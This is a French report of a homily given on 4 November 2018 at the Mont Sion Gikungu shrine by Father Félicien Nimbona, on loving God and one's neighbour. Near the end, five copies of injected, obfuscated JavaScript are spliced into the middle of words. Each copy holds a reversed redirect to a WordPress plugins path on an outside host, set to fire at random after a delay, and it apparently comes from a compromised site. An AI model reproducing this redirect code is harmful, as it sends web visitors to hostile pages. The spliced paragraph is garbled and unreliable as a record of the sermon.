Jésus résume les Dix commandements et 613 Préceptes des israélites en un seul: « tu aimeras le Seigneur ton Dieu de tout ton cœur; de toute ton âme; de tout ton esprit et de toute ta force. Tu aimeras ton prochain comme toi- même.»
C‘était le dimanche 4 novembre 2018 à Mont Sion Gikungu. La célébration eucharistique de ce 31e dimanche du temps ordinaire a été présidée par le Père Félicien Nimbona, Recteur du Sanctuaire marial de Schoenstatt Mont Sion Gikungu. En introduisant, le Père Nimbona a signalé que les lectures du jour nous prescrivent ce que nous sommes appelés à être et à faire: Aimer notre Dieu de tout notre cœur, de toute notre âme et de toutes nos forces.
Dans son homélie, le P. Nimbona a d’abord rappellé d’où sont venus les commandements: « Nous savons que Moïse a reçu deux morceaux de pierres sur lesquels étaient inscrits les dix commandements que nous ne devons ni oublier ni ignorer. » Il a ajouté que les Israelites les ont multiplié jusqu’à en faire plus de six cents. Ceci a alors semé une confusion dans les cœurs des gens jusqu’aux temps de Jésus. C’est ainsi qu’un des scribes est allé rencontrer Jésus à ce propos. Il voulait connaître le plus grand de tous ces commandements. La majorité des Juifs portaient sur leurs bras des insignes sur lesquels étaient prescrits tous les préceptes. Et ils les ignorent pourtant. « C’est de même quand on voit actuellement beaucoup de personnes qui portent le chapelet autour du cou et même sur les bras mais que très peu savent le réciter. » a souligné le Père Félicien.
A côté de ce commandement, nous sommes appelés à aimer notre prochain comme nous nous aimons nous-mêmes. Et Jésus de nous dire: » Aimez vos ennemis et priez pour ceux qui vous persécutent. » Notre ami et notre prochain n’est seulement pas celui ou celle avec qui nous partageons l’idéologie politique, le groupe de prière et autre. C‘est plutôt toute personne rencontrée tel que nous l’a montré le bon Samaritain, lui qui a secouru une personne en danger alors qu’il ne la connaissait pas. Voilà l’amour du prochain que nous a dit Jésus dans cette évangile.
Cet amour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit commencer en familles et dans le voisinage. La famille des croyants toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être caractérisée par l’amour entre ses membres. Nous aurons compris que l’amour n’est seulement pas ce que nous chantons à tort pour justifier la prostitution, la criminalité, les tueries et toutes autres pratiques indignes des chrétiens. L’amour du prochain n’est pas non plus le fait de vouloir légaliser nos fautes via les décisions politiques et votes au parlement afin d’alléger notre culpabilité. L’Eglise est contre ces pratiques. Demantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons-nous qui est notre ennemi et qui est notre ami pour pouvoir traiter chacun selon la prescription biblique. A nos ennemis, la Bible nous ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne de les aimer et de prier pour eux. Quant à nos amis, il nous ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne de les aimer comme nous-mêmes. Nous sommes appelés à aimer tout le monde.
Prions les uns pour les autres afin que la Vierge Marie intercède pour nous dans l’accomplissement de la volonté et la loi divine.
Méthode Nyandwi